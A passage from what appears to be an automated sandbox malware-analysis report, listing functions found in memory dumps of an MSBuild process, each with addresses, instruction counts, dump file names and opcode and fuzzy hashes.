                        • Opcode ID: 01b662a0b8b19a8a563ef583daaa9e0582dbacc2eb87da140355ec2f6ecd4147
                        • Instruction ID: a84227533b6b52a54d6a55d9858e20c61691267e511e14502c4eed81a4f8e485
                        • Opcode Fuzzy Hash: 01b662a0b8b19a8a563ef583daaa9e0582dbacc2eb87da140355ec2f6ecd4147
                        • Instruction Fuzzy Hash: FD713B34B012198FDB04DF69C998AAEBBF6FF88350F158069E90597365CB35DC42CBA1
                        Function 0673DB2E Relevance: .2, Instructions: 183COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cd66c3db23c1e53b3c57e4b4796e3ef1f180372eb36542ae73415718cd6bba4e
                        • Instruction ID: 0e72e65c31179ee6ffcb5b5dbca77e02d48c2e664083e4948d80b0eb9ad41884
                        • Opcode Fuzzy Hash: cd66c3db23c1e53b3c57e4b4796e3ef1f180372eb36542ae73415718cd6bba4e
                        • Instruction Fuzzy Hash: EB816034E10219CFDB64EFB4C458AADBBB2FF49305F10856AD515AB262EF709985CF40
                        Function 06760880 Relevance: .2, Instructions: 183COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4ad173a00af3edfde3c8d4bf40bc92e590c9aecdf7734dc41e04796f94517f83
                        • Instruction ID: 2d865e284e95b6c66ef108f456cf706a69d44a053524be4b9ed38526fa558f8e
                        • Opcode Fuzzy Hash: 4ad173a00af3edfde3c8d4bf40bc92e590c9aecdf7734dc41e04796f94517f83
                        • Instruction Fuzzy Hash: 91519F35B003049FCB65DF7AD98446EBBF6BF893107148A29E95AC7361DB30EC068B91
                        Function 0676C7D7 Relevance: .2, Instructions: 179COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 22514ec976be2a5fcee0836500317cd92162c7d78105fe963158c0a9eb3b01ae
                        • Instruction ID: abbd6baa5ee177712295040d4fcf49dd5b4f1db4d50de72e2568c0f5c7b5cdd6
                        • Opcode Fuzzy Hash: 22514ec976be2a5fcee0836500317cd92162c7d78105fe963158c0a9eb3b01ae
                        • Instruction Fuzzy Hash: 07612270A002159FCB51DF79D8446AEBBB2FF84304F048969E9469B3A6DB34ED45CBE0
                        Function 0673FD40 Relevance: .2, Instructions: 175COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6a7cb62fdc12df712d31dabaced5ba33b6af62aad1a86b5578c2081c4a1accdd
                        • Instruction ID: 846dc0d5156e3e3e1fbf484cfa01e953afe940efdfeec77cd0e066b7ad8b70fe
                        • Opcode Fuzzy Hash: 6a7cb62fdc12df712d31dabaced5ba33b6af62aad1a86b5578c2081c4a1accdd
                        • Instruction Fuzzy Hash: 68611934B002198FDB04DF69C988AAEBBF6FF88350F248469E90597365CB35DC41CBA1
                        Function 06732920 Relevance: .2, Instructions: 173COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eb12a2275b8ecf4f4aeaf67752d408815e80a904deea1224e643d47302cfb65e
                        • Instruction ID: 13f4fb0c61d97572071aba598d12650743324088ef4c201fe0ae30baaff4b012
                        • Opcode Fuzzy Hash: eb12a2275b8ecf4f4aeaf67752d408815e80a904deea1224e643d47302cfb65e
                        • Instruction Fuzzy Hash: DB511530A003248FCB54EF79E8142AE7BB6EF85310F108A69E515D7386EF319D46CB91
                        Function 0673EB48 Relevance: .2, Instructions: 168COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6705965c390c6e6599e061716f6482fc3561e64b54871cdfdcd6e4e2e75dbd02
                        • Instruction ID: cbd96008c03ab5e78899237db84fd7df9a0843f3948a7d8399d2160a809c6470
                        • Opcode Fuzzy Hash: 6705965c390c6e6599e061716f6482fc3561e64b54871cdfdcd6e4e2e75dbd02
                        • Instruction Fuzzy Hash: 67713A74A01219DFDB64DF58D588AADBBB2FF44310F054569E806AB3A2DB30EC85CF51
                        Function 06763CEF Relevance: .2, Instructions: 159COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a2db852ea2e773e774eb1e8a4f7432a438d379180c3bdc6a692411cb703ebe3a
                        • Instruction ID: 548055c9695cfe8b5996e83dceaeb6e8d39f6a8f204307a86ff3e7ef447c8553
                        • Opcode Fuzzy Hash: a2db852ea2e773e774eb1e8a4f7432a438d379180c3bdc6a692411cb703ebe3a
                        • Instruction Fuzzy Hash: 86610375A10209EFCB94CF59D484A9DBBF6EF89320F158569F9019B361DB30EC84CB90
                        Function 066F0448 Relevance: .2, Instructions: 156COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 48b7f325d8e59764610decb586d6cfe873b633b6040fcce6a24c1abd139b252d
                        • Instruction ID: 3784541d54fee0b9619f69b63d82dd59c3ab822e55865d2f83fc395449268ddd
                        • Opcode Fuzzy Hash: 48b7f325d8e59764610decb586d6cfe873b633b6040fcce6a24c1abd139b252d
                        • Instruction Fuzzy Hash: 9E519B34B102058FCB14DB69D8A496BBBF6EF883507148169EA4ADB356EE35EC01C7A1
                        Function 066F1028 Relevance: .2, Instructions: 150COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9a5cd7f12bd3247261f586ed9a92f1c23e789c7ff4c1e3146b89305fa08773e4
                        • Instruction ID: 4ebc5b6fbb2b1e6d563f052c0275fb3948594f155835bea5f6e1e33d78491b12
                        • Opcode Fuzzy Hash: 9a5cd7f12bd3247261f586ed9a92f1c23e789c7ff4c1e3146b89305fa08773e4
                        • Instruction Fuzzy Hash: 8B51AC306047408FC315DB39E89892ABBE2FF86214B14856AE54ACB366CF70EC45CB90
                        Function 0101FA18 Relevance: .1, Instructions: 147COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6a7820d9cb4915f29c385310cfae7595d24f53fc2b25cb862066576d0ae963d7
                        • Instruction ID: 1ad0efdf044b236e8e436444bfaa46c8cf9ed565d73d098feaa002ca262cc447
                        • Opcode Fuzzy Hash: 6a7820d9cb4915f29c385310cfae7595d24f53fc2b25cb862066576d0ae963d7
                        • Instruction Fuzzy Hash: 29618439A03308DFCB79AFB2D61866D7B72FB49345B2045AAEA0256724CB778C45DF01
                        Function 0673F2B0 Relevance: .1, Instructions: 147COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 06b23861ccf307a6597a523029417302e9ebde81ea46dbbb562437e693e7318f
                        • Instruction ID: d8b3671290987dc70b69df5e71b8bb9ca1fcc23587047fa320df3b1ab0649f0d
                        • Opcode Fuzzy Hash: 06b23861ccf307a6597a523029417302e9ebde81ea46dbbb562437e693e7318f
                        • Instruction Fuzzy Hash: 17510735A01219DFCB44DF68D58489EFBF6BF88310B25816AE915DB362CB34EC41CB90
                        Function 06730860 Relevance: .1, Instructions: 145COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c2cf69bc88e227f8d35e3bd437389d9d92ff3978fd861fb1f961ed90a61309f8
                        • Instruction ID: fda6319b4a126767988ecae3ead1b4f05d98309942f77358da5581ca96f66cae
                        • Opcode Fuzzy Hash: c2cf69bc88e227f8d35e3bd437389d9d92ff3978fd861fb1f961ed90a61309f8
                        • Instruction Fuzzy Hash: 6451BA71A003149FD754DFB9C454BAABBF6AF88310F04846DE446AB3A2DB34EC45CBA1
                        Function 066F1608 Relevance: .1, Instructions: 145COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a102d9dc97cd0b50e5c5f6f4bb19964b666b86efd9f78561c158eed4490dfe6a
                        • Instruction ID: e02f5f74acec42367722c766e3c40f7b57b69430eddd0e6865b7f0afe35d82a3
                        • Opcode Fuzzy Hash: a102d9dc97cd0b50e5c5f6f4bb19964b666b86efd9f78561c158eed4490dfe6a
                        • Instruction Fuzzy Hash: 2141E5357182558FC7855B39D86833EFFD2EBC6250F188579E60ACB382DE348C068B95
                        Function 0101CF88 Relevance: .1, Instructions: 137COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ec78dcc4c2427214d90be1db69be58bb9fdeefae13bb05d5adbad514959bc89c
                        • Instruction ID: b375fdae92026d16caa57ca66ca0a25fc5475fcbe76812ceaab6bdbcb90ce351
                        • Opcode Fuzzy Hash: ec78dcc4c2427214d90be1db69be58bb9fdeefae13bb05d5adbad514959bc89c
                        • Instruction Fuzzy Hash: 85411134704209AFCB15AF79E819B5A7FB6EBC6361F20866AF519CB3D5CE358802C750
                        Function 0673905B Relevance: .1, Instructions: 137COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5fdc1d9361f6697a05b75d3ac755a11dc246686f1cb07df51a8ee89a5fb02c7b
                        • Instruction ID: b47881675cb099685fcf96eaf189072b62c0c281ae9c54f72fb3a1f86951f2c7
                        • Opcode Fuzzy Hash: 5fdc1d9361f6697a05b75d3ac755a11dc246686f1cb07df51a8ee89a5fb02c7b
                        • Instruction Fuzzy Hash: 65519331E10228CFCB54DFA9D8446ADBBB6FF88310F10856DD605A7352EB71AD45CB80
                        Function 066F0618 Relevance: .1, Instructions: 131COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9356f4e08f5b63953b31032af29f3fc2ef5ff9590d0f4c2930b7bcf8e1af2958
                        • Instruction ID: 7bc3f35a4b648be751c18d7a32f732ebdec563abfc680be11ab9e03e57674b1c
                        • Opcode Fuzzy Hash: 9356f4e08f5b63953b31032af29f3fc2ef5ff9590d0f4c2930b7bcf8e1af2958
                        • Instruction Fuzzy Hash: 235151746102059FCB44DF28D894AAA7BF1FF89310B1585A9ED19DB366DB30EC05CFA0
                        Function 01018138 Relevance: .1, Instructions: 130COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ef484d6ae5fbb5829805c3b225cfbda6d4c8e538b6607275e1cfb7d6becdd1fe
                        • Instruction ID: 1310841573445e1f3d84aacacf3cfba4e46271dd05a929eb333b9bd0c605a3e0
                        • Opcode Fuzzy Hash: ef484d6ae5fbb5829805c3b225cfbda6d4c8e538b6607275e1cfb7d6becdd1fe
                        • Instruction Fuzzy Hash: CF41F331B105088FCB04FFB8D85906DBBB6FF8A310B548619E452A73E9DF349A49C762
                        Function 06739063 Relevance: .1, Instructions: 130COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d0923930d213df504fb7c04923723e779a61cc7e9008ee7b9e4ed564e9fcb6ae
                        • Instruction ID: 99073f243878a9f2373ce12cec03574b622bedba1647c06aff18580db0ec31a8
                        • Opcode Fuzzy Hash: d0923930d213df504fb7c04923723e779a61cc7e9008ee7b9e4ed564e9fcb6ae
                        • Instruction Fuzzy Hash: E851B531E10228CFCB54DFA9D8546ADBBB6FF49310F10856DD605AB392EB70AD45CB80
                        Function 010164D8 Relevance: .1, Instructions: 126COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 94d9bc5e8af0545f7020e126ae3135e82f74469b77c784a25bd573dfd03a8222
                        • Instruction ID: 08e81d7ef7241306adce9e5ae0ecb92768cf55c4e5dbbafbbc6750d06e004629
                        • Opcode Fuzzy Hash: 94d9bc5e8af0545f7020e126ae3135e82f74469b77c784a25bd573dfd03a8222
                        • Instruction Fuzzy Hash: 68419E75B002148FCB04EB78E89566EBBF3EFC8310B148529E805EB399DE359C41CB90
                        Function 0101AE00 Relevance: .1, Instructions: 125COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a4edc25df396e87e3b08e342a1f6c50c73e62684333280128d19a723d41618d5
                        • Instruction ID: 7b9bd4a9ed63aaa3c0a8edc5390b3e0f9edc3e2234377108a601a1d16adac89c
                        • Opcode Fuzzy Hash: a4edc25df396e87e3b08e342a1f6c50c73e62684333280128d19a723d41618d5
                        • Instruction Fuzzy Hash: 6A418D70B01246CFDB14DB59D584AAEFBF2EF80310F09C195E5499B3AAD738E845CB90
                        Function 01018148 Relevance: .1, Instructions: 124COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0b00610723cb6f7dc01b59f8cc0b60593792c96c38a8f6d7d0b1522a49db7093
                        • Instruction ID: 4bc452853ed968de66ecc2e406ada912ea2f42f39e1bb9a273d5271657924961
                        • Opcode Fuzzy Hash: 0b00610723cb6f7dc01b59f8cc0b60593792c96c38a8f6d7d0b1522a49db7093
                        • Instruction Fuzzy Hash: 8041A234B105088FCB04FFB8D55906DBBB6FF8A310B548619E452A73E9DF345949C762
                        Function 066FB6E8 Relevance: .1, Instructions: 119COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ecae1bce1d66b4be2953285a8e0bb7a2b59164dcb566c3ba2364e8051527ed56
                        • Instruction ID: 9546d5f6ebeed9670fe28fd1bb38ec45eb372e220060d6c88a611f814d7e0c42
                        • Opcode Fuzzy Hash: ecae1bce1d66b4be2953285a8e0bb7a2b59164dcb566c3ba2364e8051527ed56
                        • Instruction Fuzzy Hash: 9D41BE34B102148FCB189B79D4986AEBBF6EF88350F144178EA05E7394DE35DC41CBA1
                        Function 0673B7C0 Relevance: .1, Instructions: 117COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b4941563e356e8f293937611201d15faedc4e20c8c46feb9a70944df6283890f
                        • Instruction ID: 4f08b58ca9718294df26171fdceba62080091e1c137d6ee6aac546015f9756fc
                        • Opcode Fuzzy Hash: b4941563e356e8f293937611201d15faedc4e20c8c46feb9a70944df6283890f
                        • Instruction Fuzzy Hash: 4041B230E0060EDFDB14EF69C585AEEBBB6FF58700F008519E945AB250EF70AA45CB91
                        Function 0676F680 Relevance: .1, Instructions: 116COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cb5086131d00b0da9a0e69d3db36331a08d1fa46c53cde0e104d762ab911ed95
                        • Instruction ID: 71e9b988af04e451d31ad421ea8b7a78788d9ad060171ea1970d57cf0ee4e134
                        • Opcode Fuzzy Hash: cb5086131d00b0da9a0e69d3db36331a08d1fa46c53cde0e104d762ab911ed95
                        • Instruction Fuzzy Hash: 6841D231B002159FCB15DF69E884AAEBBB7FF89300B148529F919C7361DB34AC01CBA0
                        Function 0101C888 Relevance: .1, Instructions: 115COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2219faaf62bec85225aa58f417711eba71cf3f4d5347496dd88d098d8a3b5a8e
                        • Instruction ID: d81f4f635fa1ff4d065ea2e7a92176fd58c16fb082f82999d14a9ae3573d55fd
                        • Opcode Fuzzy Hash: 2219faaf62bec85225aa58f417711eba71cf3f4d5347496dd88d098d8a3b5a8e
                        • Instruction Fuzzy Hash: 154124347043548FDB09AF38E85962A7FFAFB86210B1049AAE406C73A5DF39DD05C790
                        Function 0673A620 Relevance: .1, Instructions: 110COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3de14f58a24d54abce91f737ef29c7b36255a7fc452ef9b6988e5af1b85e9ad0
                        • Instruction ID: 278cc0c8be9855ffc6edcb2b68d910fef4ab0fccf558570eb66dae28a9596f7f
                        • Opcode Fuzzy Hash: 3de14f58a24d54abce91f737ef29c7b36255a7fc452ef9b6988e5af1b85e9ad0
                        • Instruction Fuzzy Hash: F6410C74A01214DFC714CF68D5859ADBBB2BF88314F248469E445AB366DB31EC45CB50
                        Function 0101FCC8 Relevance: .1, Instructions: 109COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 73a2e6b615fe417e420a68e904d390da32ea7e2b5f400e3b7830c9fd021d8386
                        • Instruction ID: bfe7868328c815ef4968a89e75f50254ceb890473209a6ce7deb670f9531077b
                        • Opcode Fuzzy Hash: 73a2e6b615fe417e420a68e904d390da32ea7e2b5f400e3b7830c9fd021d8386
                        • Instruction Fuzzy Hash: 5741D370B002199FDB14EBB9E9157AE7FB2AF80300F1044A5E501DB39AEF789D09DB91
                        Function 0673C571 Relevance: .1, Instructions: 105COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 49cb5063490523d4a0ae91acdb3b3dcfba52290491a490eccbd2fcb2d537c9c1
                        • Instruction ID: 183ceb332e28956e1ebb1aedb64ae173ad3713e64579839056c5938cf21b700d
                        • Opcode Fuzzy Hash: 49cb5063490523d4a0ae91acdb3b3dcfba52290491a490eccbd2fcb2d537c9c1
                        • Instruction Fuzzy Hash: B5418F71E00269CFCB56DB78C9545FCBBF1AF4A200F289168D945BB256EB31AD80CB90
                        Function 0673A5E6 Relevance: .1, Instructions: 102COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8454b43625a4ae37bd11a110d53acc44254deb559281b79caa2e1c661fa70cd6
                        • Instruction ID: f6c9285137e032f0b058b8b2f218cb26ba8f31de08440fb2c15f9d7688ffff1a
                        • Opcode Fuzzy Hash: 8454b43625a4ae37bd11a110d53acc44254deb559281b79caa2e1c661fa70cd6
                        • Instruction Fuzzy Hash: 78410574A01204CFCB14CF68D5859ADBBF2FF88314F6485A9E455AB766CB31EC86CB90
                        Function 0673A630 Relevance: .1, Instructions: 101COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e40e94f231e56e13043a27330ec6687d0de0bdfee0a61e512aac2adf3a7ddeb3
                        • Instruction ID: ac64535928e38713c2b9009e93725c2e9a2af87829e8575d2662789e74032810
                        • Opcode Fuzzy Hash: e40e94f231e56e13043a27330ec6687d0de0bdfee0a61e512aac2adf3a7ddeb3
                        • Instruction Fuzzy Hash: F641D774A01204DFCB18CF68D58599DBBF2FF88314F2484A9E855AB365DB71EC85CB90
                        Function 066FE6F7 Relevance: .1, Instructions: 101COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1e3fa2be6b0c69820f960b0e45779f0d26442d99f5853fb4b7061f09bfc69c66
                        • Instruction ID: 92d076de4f4718a082d0c76422a99e9d1c27f199a6e6518d8fa3c7a0cf730134
                        • Opcode Fuzzy Hash: 1e3fa2be6b0c69820f960b0e45779f0d26442d99f5853fb4b7061f09bfc69c66
                        • Instruction Fuzzy Hash: 1A41A230600642EFC705DF78D98496ABF72FF85310B04866AD9069B756DB30ED45CBE1
                        Function 0101D310 Relevance: .1, Instructions: 99COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4cec7d4e1b8b9bd8e0f8aefdc3ffbd638f68d178a07eb56eea62d4eff8b2531b
                        • Instruction ID: cc61f3bf2a22c645cdf3d214897871b60d8b83d6f4ea13603c1fe341ec0b6a6e
                        • Opcode Fuzzy Hash: 4cec7d4e1b8b9bd8e0f8aefdc3ffbd638f68d178a07eb56eea62d4eff8b2531b
                        • Instruction Fuzzy Hash: 053192347402088FDB58DF58D499AEE7BF6EF88310F1444A8E5469B3A9CF35AC41DB90
                        Function 06763C10 Relevance: .1, Instructions: 99COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 49149f742882ef0ced3cff5abd1c878f308ec48801463e1fa66fd2a4391a0022
                        • Instruction ID: f539e2f70dc9eaa044679496da3a51cb59bcd0325154174a73d1682dd47d5b82
                        • Opcode Fuzzy Hash: 49149f742882ef0ced3cff5abd1c878f308ec48801463e1fa66fd2a4391a0022
                        • Instruction Fuzzy Hash: B93126729187588FC755DB68C4448A67FF9FF06224B0456DFF182CB2A2EA30E946CB91
                        Function 010108C8 Relevance: .1, Instructions: 98COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3ad1fecac9d5668a44bde792b3b7a4b23f4c40cee9d6b61a8d7cd61701a8e97f
                        • Instruction ID: 03b0bada18ac8eda0511cdbc125be9fc23a035614225b75fde0692d1d1fe0555
                        • Opcode Fuzzy Hash: 3ad1fecac9d5668a44bde792b3b7a4b23f4c40cee9d6b61a8d7cd61701a8e97f
